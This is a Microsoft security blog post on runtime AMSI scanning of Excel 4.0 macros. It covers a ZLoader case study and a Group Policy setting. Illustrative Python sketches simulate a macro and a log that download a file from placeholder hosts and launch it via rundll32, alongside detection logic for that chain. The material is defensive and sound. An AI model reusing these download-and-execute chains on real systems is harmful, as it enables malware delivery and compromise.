We have recently expanded the integration of Antimalware Scan Interface (AMSI) with Office 365 to include the runtime scanning of Excel 4.0 (XLM) macros, to help antivirus solutions tackle the increase in attacks that use malicious XLM macros. This integration, an example of the many security features released for Microsoft 365 Apps on a regular basis, reflects our commitment to continuously increase protection for Microsoft 365 customers against the latest threats.

Microsoft Defender Antivirus is using this integration to detect and block XLM-based malware, and we encourage other antivirus products to use this open interface to gain better visibility and improve protections against these threats.

XLM is a legacy macro language that was made available to Microsoft Excel in 1992, before the introduction of Visual Basic for Applications (VBA) in 1993. While more rudimentary than VBA, XLM is powerful enough to provide interoperability with the operating system, and many organizations and users continue to use its functionality for legitimate purposes. Cybercriminals know this, and they have been abusing XLM macros, increasingly more often, to call Win32 APIs and run shell commands.

The AMSI instrumentation for VBA has been providing deep visibility into the runtime behavior of VBA macros. Its release in 2018 effectively removed the armor that macro obfuscation equipped malware with, exposing malicious code to improved levels of scrutiny. Naturally, threat actors like those behind Trickbot, Zloader, and Ursnif have looked elsewhere for features to abuse and operate under the radar of security solutions, and they found a suitable alternative in XLM.

Like VBA and many other scripting languages abused by malware, XLM code can be obfuscated relatively easily to conceal the real intent of the macro. For example, attackers can hide URLs or file names of executable files from static inspection through simple string manipulations. Attackers also take advantage of the way macro code persists within the Excel document: while VBA macros are stored in a dedicated OLE stream (and hence can be easily located and extracted), XLM macros do not exist as a separate, well-defined entity. Rather, each XLM macro statement is a formula within a cell. Extracting a whole XLM macro can become a cumbersome task, requiring a cell-by-cell inspection of the whole document.

Figure 1. Sample malicious XLM macro

In addition, while formulas are typically executed downwards starting from the top, with XLM the macro content can be quite spread out, thanks to control flow statements like RUN, CALL, or GOTO, which allow execution flow to switch from one column to another. This feature, together with obfuscation, has been abused by attackers to craft documents that could evade static analysis.

AMSI instrumentation for Excel 4.0 (XLM) macros

AMSI is an open interface that allows any application to request the scan of any data at any time. In a nutshell, this technology gives applications the capability to interface with the installed antivirus solution in order to inspect and scan potentially dangerous data (e.g., a file downloaded from a remote location, or data generated dynamically by an application). Microsoft already uses this technology in various applications to detect malicious macros, script-based malware, and other threats:

- Office VBA macros
- JScript
- VBScript
- PowerShell
- WMI
- Dynamically loaded .NET assemblies
- MSHTA/Jscript9

The data provided by AMSI is leveraged extensively by Microsoft Defender for Endpoint. It provides important data for machine learning models that process millions of signals every day to identify and block malicious behaviors. The XLM instrumentation is similar to the implementation in VBA and other scripting engines that are integrated with AMSI:

Figure 2. AMSI instrumentation for XLM

The XLM language allows a user to write programs that call native runtime functions, as well as external Win32 APIs. In both cases, the interfaces that dispatch the calls to these functions are intercepted and directed to an internal logger. The logger component stores the intercepted functions in text format within a circular buffer. When certain dangerous functions are called, for example the runtime function EXEC or the Win32 API ShellExecute, XLM halts the macro execution and invokes AMSI to request a synchronous scan of the circular buffer containing the functions logged up to that point. Such dangerous functions are called “trigger functions”. If the antivirus identifies the macro as malware, the execution of the macro is aborted and Excel is safely terminated, blocking the attack and preventing the malicious macro from doing any damage. Otherwise, the user experience continues seamlessly.

It’s important to observe that the interception of XLM function calls happens at runtime. This means that the logger component always registers the true behavior of all functions and associated parameters, which may contain URLs, file names, and other important IOCs, irrespective of the obfuscation used by the malware.
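The flow described above can be modelled in a few lines. This is an added illustration, not Microsoft's implementation: the class and function names, the cell contents, the log line format and the scanner rule are all hypothetical.

```python
from collections import deque

# Trigger functions named in the article; the real list is not published here.
TRIGGERS = {"EXEC", "ShellExecuteA"}

class MacroBlocked(Exception):
    """Raised when the scanner flags the behaviour log."""

class XlmLogger:
    """Models the logger: intercepted calls are stored as text in a circular buffer."""
    def __init__(self, scan, capacity=64):
        self.buffer = deque(maxlen=capacity)   # bounded buffer of logged calls
        self.scan = scan                       # stand-in for the AMSI scan request
        self.scans = []                        # every log handed to the scanner

    def call(self, name, *args):
        # Arguments arrive already evaluated, so the log holds the real values.
        self.buffer.append(f"{name}({', '.join(repr(a) for a in args)})")
        if name in TRIGGERS:
            log = "\n".join(self.buffer)       # scanned before the call proceeds
            self.scans.append(log)
            if self.scan(log):
                raise MacroBlocked(name)

def run_macro(cells, logger):
    """Constructed macro: its strings are assembled from scattered cells at run time."""
    url = cells["CA1889"] + cells["BX12"]
    path = cells["D7"]
    logger.call("URLDownloadToFileA", 0, url, path, 0, 0)
    logger.call("ShellExecuteA", 0, "open", "rundll32.exe", path, 0, 5)
    return "macro finished"

def toy_scanner(log):
    # Hypothetical provider verdict, only here to drive the abort path.
    return "URLDownloadToFileA" in log and "rundll32.exe" in log

def demo():
    # Constructed cell contents; no single cell holds the full URL.
    cells = {"CA1889": "http://exam", "BX12": "ple.test/a.bin", "D7": r"C:\Temp\a.txt"}
    logger = XlmLogger(toy_scanner)
    try:
        outcome = run_macro(cells, logger)
    except MacroBlocked as exc:
        outcome = f"blocked at {exc}"
    return outcome, logger.scans
```

The log handed to the scanner contains the reassembled URL even though the sheet never stores it in one piece, which is the property the paragraph above relies on.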

The following is an example of an XLM macro found in a malicious document:

Figure 3. Sample XLM macro

This malicious macro consists of a series of commands (e.g., RUN, REGISTER, IF, etc.) with related parameters specified by references to other cells. For instance, the token $CA$1889 passed to the first function RUN indicates that the string provided as parameter for this function is in the cell at column CA and row 1889.

This is only one of the many ways that XLM-based malware can obfuscate code. Detecting this macro is challenging because it doesn’t expose any suspicious strings or behavior. This is where the power of AMSI comes into play: the instrumentation allows XLM to inspect functions when they are invoked, so that all their parameters have already been de-obfuscated. As a result, the above macro produces a log that looks like the following:

Figure 4. Sample log

The XLM engine determines that the dangerous function ShellExecuteA is being invoked, and subsequently places the macro execution on hold and passes the macro behavioral log to AMSI for scanning. The antivirus now has visibility into a behavioral log that fully exposes all of the data, including API names, URLs, and file names. The log makes it easy to conclude that this macro is trying to download and execute a DLL payload via the tool Rundll32.

Case study: ZLoader campaign

ZLoader is a malware family that has been active in perpetrating financial theft for several years. Like many of its peers, ZLoader operates via aggressive campaigns that rely on social engineering and the abuse of Office documents spread via email.

We have been monitoring the activity of this threat and observed that in the last year the attackers shifted to XLM as their infection vector of choice. The Excel documents have a typical lure message to trick the user into clicking “Enable Content” to allow the macro code to run.

Figure 5. Malicious Excel file used in Zloader campaign

A closer look at the document reveals an Excel sheet with an obscure-looking name. That sheet embeds XLM macro formulas, which are stored several rows down to make the sheet appear empty. Furthermore, the macro formulas are spread out and obfuscated, impeding static analysis and raising more challenges for identifying intent.

Figure 6. Malicious XLM macro used in ZLoader campaign

Executing and debugging the macro with Excel is not very straightforward either. The macro has long loops that are used to decode and run further obfuscated macro formulas, and Excel’s debugger doesn’t have the ability to control the execution in a granular way in order to skip loops and break on specific formulas.

However, when this macro runs with the AMSI instrumentation enabled, it produces up to three different logs that are passed to AMSI. The first two look like the following:

Figure 7. Log made when ZLoader’s XLM macro is run

The image only shows the final part of the log where the interesting activity shows up. We can see that the macro is issuing a new EXEC statement to run a .vbs file via explorer.exe. This EXEC statement causes the execution of the VBScript named EW2H.vbs, which has been decoded and saved to disk by the macro prior to the EXEC line. The VBScript then tries to download and run a binary payload. The macro attempts to do this twice, hence this log (with minor changes) is passed to AMSI twice.

If the above steps fail, the macro resorts to downloading the payload directly, producing the following log for AMSI:

Figure 8. Log created when ZLoader’s XLM macro is run

The macro defines two URLs, then downloads their contents with the API URLDownloadToFileA, and finally invokes the API ShellExecuteA to launch the downloaded payload (the file jxi09.txt) via rundll32.exe. We can infer from this line that the payload is a DLL.

All three logs give plenty of opportunities to detect malicious behavior and also allow the easy extraction of relevant IOCs like URLs, file names, etc. The initial XLM code in the Excel document is completely obfuscated and contains no usable information, making it tricky to write static detections that are both effective and durable. With the dynamic nature of AMSI, the runtime behavior can be observed in cleartext, even with obfuscation. Detections based on the logs passed to AMSI also have the advantage of being more robust and generic in nature.
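As an added example of what a provider can do with such a log (not code from Microsoft or from any antivirus product), the sketch below extracts IOCs and flags the download-then-launch chain described for the third log. The log line format, the URLs and the directory are constructed; only the API names and the file name jxi09.txt come from the article.

```python
import re

CALL_RE = re.compile(r"^(\w+)\((.*)\)$")      # Name(arg, arg, ...)
STR_RE = re.compile(r'"([^"]*)"')             # quoted string arguments
DOWNLOADERS = {"URLDownloadToFileA"}
LAUNCHERS = {"EXEC", "ShellExecuteA"}         # trigger functions named in the article

# Constructed sample log in an assumed one-call-per-line format.
SAMPLE_LOG = r'''
URLDownloadToFileA(0, "https://one.example/load", "C:\Temp\jxi09.txt", 0, 0)
URLDownloadToFileA(0, "https://two.example/load", "C:\Temp\jxi09.txt", 0, 0)
ShellExecuteA(0, "open", "rundll32.exe", "C:\Temp\jxi09.txt", 0, 5)
'''

def analyse(log):
    """Extract IOCs from one behaviour log and flag a download-then-launch chain."""
    urls, files, dropped, findings = [], set(), set(), []
    for line in log.strip().splitlines():
        m = CALL_RE.match(line.strip())
        if not m:
            continue                               # skip lines we cannot parse
        name, strings = m.group(1), STR_RE.findall(m.group(2))
        for s in strings:
            if s.lower().startswith(("http://", "https://")):
                urls.append(s)
            elif re.search(r"\.\w{2,4}$", s):
                files.add(s)                       # anything ending in an extension
        if name in DOWNLOADERS and len(strings) >= 2:
            dropped.add(strings[1].lower())        # second string: local target path
        if name in LAUNCHERS:
            lowered = [s.lower() for s in strings]
            for path in sorted(dropped):
                if any(path in s for s in lowered):
                    findings.append(f"{name} launches downloaded file {path}")
                    if any("rundll32" in s for s in lowered) and not path.endswith(".dll"):
                        findings.append("rundll32 target lacks .dll extension")
    return {"urls": urls, "files": sorted(files), "findings": findings}
```

Because the rule keys on the relationship between calls rather than on any literal string in the sheet, it is unaffected by how the macro assembled its parameters.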


Runtime inspection of XLM macros is now available in Microsoft Excel and can be used by antivirus solutions like Microsoft Defender Antivirus that are registered as an AMSI provider on the machine. This feature is included as an addition to the existing AMSI integration with Office. It’s enabled by default on the February Current Channel and Monthly Enterprise Channel for Microsoft 365 subscription users.

In its default configuration, XLM macros are scanned at runtime via AMSI, except in the following scenarios:

- Files opened while macro security settings are set to “Enable all macros”
- Files opened from a trusted location
- Files that are trusted documents

Administrators can now use the existing Microsoft 365 applications policy control to configure when both XLM and VBA macros are scanned at runtime via AMSI. Get the latest group policy template files.

Group Policy setting name: Macro Runtime Scan Scope

Path: User Configuration > Administrative templates > Microsoft Office 2016 > Security Settings

This policy setting specifies the behavior for both the VBA and Excel 4.0 (XLM) runtime scan features. Multiple Office apps support VBA macros, but XLM macros are only supported by Excel. Macros can only be scanned if the antivirus software registers as an Antimalware Scan Interface (AMSI) provider on the device.

If you enable this policy setting, you can choose from the following options to determine the macro runtime scanning behavior:

Disable for all files (not recommended): If you choose this option, no runtime scanning of enabled macros will be performed.

Enable for low trust files: If you choose this option, runtime scanning will be enabled for all files for which macros are enabled, except for the following files:

- Files opened while macro security settings are set to “Enable all macros”
- Files opened from a trusted location
- Files that are Trusted Documents
- Files that contain VBA that is digitally signed by a trusted publisher

Enable for all files: If you choose this option, then low trust files are not excluded from runtime scanning. The VBA and XLM runtimes report to an antivirus system certain high-risk code behaviours the macro is about to execute. This allows the antivirus system to indicate whether or not the macro behaviour is malicious. If the behavior is determined to be malicious, the Office application closes the session and the antivirus system can quarantine the file. If the behavior is non-malicious, the macro execution proceeds.

Note: When macro runtime scanning is enabled, the runtime performance of affected VBA projects and XLM sheets may be reduced.

If you disable this policy setting, no runtime scanning of enabled macros will be performed.

If you don’t configure this policy setting, “Enable for low trust files” will be the default setting.

Note: This policy setting only applies to subscription versions of Office, such as Microsoft 365 Apps for enterprise.

AMSI improves security for all

AMSI provides deep and dynamic visibility into the runtime behaviors of macros and other scripts to expose threats that hide malicious intent behind obfuscation, junk control flow statements, and many other tricks. Microsoft Defender Antivirus, the built-in antivirus solution on Windows 10, has been leveraging AMSI to uncover a wide range of threats, from common malware to sophisticated attacks. The recent AMSI instrumentation in XLM directly tackles the rise of malware campaigns that abuse this feature. Because AMSI is an open interface, other antivirus solutions can leverage the same visibility to improve protections against threats. Security vendors can learn how to leverage AMSI in their antivirus products here.

At Microsoft, we take full advantage of signals from AMSI. The data generated by AMSI is not only useful for immediate client antimalware detections, but also provides rich signals for Microsoft Defender for Endpoint. In our blog post about AMSI for VBA, we described how these signals are ingested by multiple layers of cloud-based machine learning classifiers and are combined with all other signals. The result is an enhanced protection layer that learns to recognize and block new and unknown threats in real time.

Figure 9. Example of detection from Microsoft Defender Antivirus based on data inspected by AMSI

Figure 10: Notification from Microsoft Excel after AMSI reported malware detection

Figure 11: Example of Microsoft Defender for Endpoint alert for detection of XLM malware

The visibility provided by AMSI leads to significant improvements in generic and resilient signatures that can stop waves of obfuscated and mutated variants of threats. AMSI-driven protection is in addition to an extensive multi-layer protection stack in Microsoft Defender for Endpoint, which also includes attack surface reduction, network protection, behavior monitoring and other technologies that protect against macro malware and other similar script-based threats.

The AMSI-enriched visibility provided by Microsoft Defender for Endpoint is further amplified across Microsoft 365 Defender, such that XLM macro threats are detected and blocked on various entry vectors. The orchestration of signal-sharing and coordinated defense in Microsoft 365 ensures that, for example, Microsoft Defender for Office 365 blocks macro malware distributed via email, which is the most common delivery method for these threats.

Learn how you can stop attacks through automated, cross-domain security and built-in AI with Microsoft 365 Defender.

Giulia Biagini, Office 365 Threat Research Team

Auston Wallace, Microsoft 365 Security Team

Andrea Lelli, Microsoft 365 Defender Research Team

The post XLM + AMSI: New runtime defense against Excel 4.0 macro malware appeared first on Microsoft Security.